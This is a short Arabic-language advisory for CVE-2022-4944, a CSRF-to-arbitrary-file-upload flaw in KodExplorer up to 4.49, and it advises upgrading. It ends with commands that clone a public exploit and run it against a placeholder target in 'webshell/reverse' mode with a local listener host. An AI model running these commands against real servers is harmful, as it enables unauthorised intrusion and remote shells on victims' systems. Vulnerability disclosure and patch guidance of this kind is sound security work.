
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF إلى رفع ملفات عشوائي

تم العثور على ثغرة أمنية، صُنفت على أنها إشكالية، في kalcaddle KodExplorer حتى الإصدار 4.49. يؤثر هذا على جزء غير معروف. يؤدي التلاعب إلى تزوير الطلبات عبر المواقع (CSRF). يتم تعريف هذه الثغرة بشكل فريد كـ CVE-2022-4944. من الممكن بدء الهجوم عن بُعد. علاوة على ذلك، يتوفر استغلال. يُنصح بترقية المكوّن المتأثر.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode